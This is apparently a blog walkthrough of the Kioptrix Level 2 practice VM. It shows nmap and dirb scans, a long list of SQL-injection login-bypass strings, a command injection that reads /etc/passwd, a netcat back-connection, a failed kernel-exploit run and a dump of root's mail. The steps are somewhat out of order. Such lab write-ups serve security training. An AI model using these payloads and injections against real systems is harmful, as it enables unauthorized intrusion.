Busy in this day with Myanmar Cyber Security Challenge 2018 (CTF) but i try to write the walkthrough of challenge VM. Ok. Try to exploit the box.
First step to know the target ip in the network, i use the nmap scan.
┌─[[email protected]]─[~] └──> nmap 192.168.1.* -sn -n Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-06 13:17 +0630 Nmap scan report for 192.168.1.1 Host is up (0.0010s latency). MAC Address: 60:E3:27:BE:75:78 (Tp-link Technologies) Nmap scan report for 192.168.1.72 Host is up (0.00023s latency). MAC Address: 00:0C:29:F7:CC:C7 (VMware) Nmap scan report for 192.168.1.78 Host is up (0.00018s latency). MAC Address: 08:00:27:CA:D9:CE (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.1.100 Host is up (0.00019s latency). MAC Address: 34:97:F6:C3:0B:66 (Asustek Computer) Nmap scan report for 192.168.1.101 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 1.97 seconds
Target IP is 192.168.1.72 and scan.
┌─[[email protected]]─[~] └──> nmap -sV 192.168.1.72 Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-06 13:20 +0630 Nmap scan report for 192.168.1.72 Host is up (0.0020s latency). Not shown: 993 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) 80/tcp open http Apache httpd 2.0.52 ((CentOS)) 111/tcp open rpcbind 2 (RPC #100000) 443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS)) 631/tcp open ipp CUPS 1.1 666/tcp open status 1 (RPC #100024) 3306/tcp open mysql MySQL (unauthorized) MAC Address: 00:0C:29:F7:CC:C7 (VMware) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.90 seconds
Yes.I try to explore port 80 first and scan to know the dir path with dirb. I just found the Remote Admin login form at the index page. Check at the source code i notice the html comment.
<!-- Start of HTML when logged in as Administator -->
I sure username is Administator. I try to login first, So let’s me test some sql login bypass query.
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
Yes login bypass success and found the form to ping in the admin panel.
' or '1'='1
I try to exploit with command injection www.google.com;cat /etc/passwd
─[✗]─[[email protected]]─[~] └──> dirb http://192.168.1.72 -r ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat Jan 6 13:22:10 2018 URL_BASE: http://192.168.1.72/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt OPTION: Not Recursive ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.1.72/ ---- + http://192.168.1.72/cgi-bin/ (CODE:403|SIZE:288) + http://192.168.1.72/index.php (CODE:200|SIZE:667) ==> DIRECTORY: http://192.168.1.72/manual/ + http://192.168.1.72/usage (CODE:403|SIZE:285) ----------------- END_TIME: Sat Jan 6 13:22:19 2018 DOWNLOADED: 4612 - FOUND: 3
https also same results. Ok. so i try to back connect with netcat.
I search the kernal version vulnerable or not at google.
And download and root it!.
https://www.exploit-db.com/exploits/1397/
But it not work
bash-3.00$ gcc Laiwon.c -o loveme Laiwon.c:730:28: warning: no newline at end of file bash-3.00$ id uid=48(apache) gid=48(apache) groups=48(apache) bash-3.00$ ./loveme [ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ] [ Discovered Jan 2005 by sd <[email protected]> ] [ Modified 2005/9 by alert7 <[email protected]> ] [+] try open /proc/cpuinfo .. ok!! [+] find cpu flag pse in /proc/cpuinfo [+] CONFIG_X86_PAE :none [+] Cpu flag: pse ok [+] Exploit Way : 0 [+] Use 1 pages (one page is 4K ),rewrite 0xc0000000--(0xc0001000 + n) [+] thread_size 0 (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 epoll_wait: Invalid argument Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux [+] idtr.base 0xc03fd000 ,base 0xc0000000 [+] kwrite base 0xc0000000, buf 0xbfedbe30,num 4100 [-] This kernel not vulnerability!!! bash-3.00$ id uid=48(apache) gid=48(apache) groups=48(apache) bash-3.00$
next exploit ! 😉
sh-3.00# cd mail cd mail sh-3.00# ls -al ls -al total 24 drwxrwxr-x 2 root mail 4096 Jan 5 18:55 . drwxr-xr-x 14 root root 4096 Oct 7 2009 .. -rw-rw---- 1 harold mail 0 Oct 12 2009 harold -rw-rw---- 1 john mail 0 Oct 8 2009 john -rw------- 1 root root 4351 Jan 5 18:55 root sh-3.00# cat root cat root From [email protected] Fri Jan 5 18:55:42 2018 Return-Path: <[email protected]> Received: from localhost (localhost) by kioptrix.level2 (8.13.1/8.13.1) id w05Ntf9C002820; Fri, 5 Jan 2018 18:55:41 -0500 Date: Fri, 5 Jan 2018 18:55:41 -0500 From: Mail Delivery Subsystem <[email protected]> Message-Id: <[email protected]> To: [email protected] MIME-Version: 1.0 Content-Type: multipart/report; report-type=delivery-status; boundary="w05Ntf9C002820.1515196541/kioptrix.level2" Subject: Postmaster notify: see transcript for details Auto-Submitted: auto-generated (postmaster-notification) This is a MIME-encapsulated message --w05Ntf9C002820.1515196541/kioptrix.level2 The original message was received at Thu, 9 Feb 2012 22:39:59 -0500 from localhost with id q1A3dxnO003116 ----- The following addresses had permanent fatal errors ----- <[email protected]> ----- Transcript of session follows ----- 451 kioptrix.level2: Name server timeout Message could not be delivered for 5 days Message will be deleted from queue --w05Ntf9C002820.1515196541/kioptrix.level2 Content-Type: message/delivery-status Reporting-MTA: dns; kioptrix.level2 Arrival-Date: Thu, 9 Feb 2012 22:39:59 -0500 Final-Recipient: RFC822; [email protected] Action: failed Status: 4.4.7 Last-Attempt-Date: Fri, 5 Jan 2018 18:55:41 -0500 --w05Ntf9C002820.1515196541/kioptrix.level2 Content-Type: message/rfc822 Return-Path: <MAILER-DAEMON> Received: from localhost (localhost) by kioptrix.level2 (8.13.1/8.13.1) id q1A3dxnO003116; Thu, 9 Feb 2012 22:39:59 -0500 Date: Thu, 9 Feb 2012 22:39:59 -0500 From: Mail Delivery Subsystem <MAILER-DAEMON> Message-Id: <[email protected]> To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/report; report-type=delivery-status; boundary="q1A3dxnO003116.1328845199/kioptrix.level2" Subject: Returned mail: see transcript for details Auto-Submitted: auto-generated (failure) This is a MIME-encapsulated message --q1A3dxnO003116.1328845199/kioptrix.level2 The original message was received at Mon, 12 Oct 2009 04:02:04 -0500 from localhost.localdomain [127.0.0.1] ----- The following addresses had permanent fatal errors ----- <[email protected]> ----- Transcript of session follows ----- 451 kioptrix.level2: Name server timeout 451 kioptrix.level2: Name server timeout 451 kioptrix.level2: Name server timeout 451 kioptrix.level2: Name server timeout Message could not be delivered for 5 days Message will be deleted from queue 451 kioptrix.level2: Name server timeout --q1A3dxnO003116.1328845199/kioptrix.level2 Content-Type: message/delivery-status Reporting-MTA: dns; kioptrix.level2 Arrival-Date: Mon, 12 Oct 2009 04:02:04 -0500 Final-Recipient: RFC822; [email protected] Action: failed Status: 4.4.7 Last-Attempt-Date: Thu, 9 Feb 2012 22:39:59 -0500 --q1A3dxnO003116.1328845199/kioptrix.level2 Content-Type: message/rfc822 Return-Path: <[email protected]> Received: from kioptrix.level2 (localhost.localdomain [127.0.0.1]) by kioptrix.level2 (8.13.1/8.13.1) with ESMTP id n9C824DR003890 for <[email protected]>; Mon, 12 Oct 2009 04:02:04 -0400 Received: (from [email protected]ost) by kioptrix.level2 (8.13.1/8.13.1/Submit) id n9C824Nj003888 for root; Mon, 12 Oct 2009 04:02:04 -0400 Date: Mon, 12 Oct 2009 04:02:04 -0400 From: root <[email protected]> Message-Id: <[email protected]> To: [email protected] Subject: LogWatch for kioptrix.level2 ################### LogWatch 5.2.2 (06/23/04) #################### Processing Initiated: Mon Oct 12 04:02:04 2009 Date Range Processed: yesterday Detail Level of Output: 0 Logfiles for Host: kioptrix.level2 ################################################################ --------------------- SSHD Begin ------------------------ SSHD Killed: 1 Time(s) ---------------------- SSHD End ------------------------- ------------------ Disk Space -------------------- /dev/mapper/VolGroup00-LogVol00 3.3G 1.5G 1.7G 47% / /dev/hda1 99M 9.3M 85M 10% /boot ###################### LogWatch End ######################### --q1A3dxnO003116.1328845199/kioptrix.level2-- --w05Ntf9C002820.1515196541/kioptrix.level2--
WooT… and Get email message.
Thanks for reading.. Happy Hacking.. 😉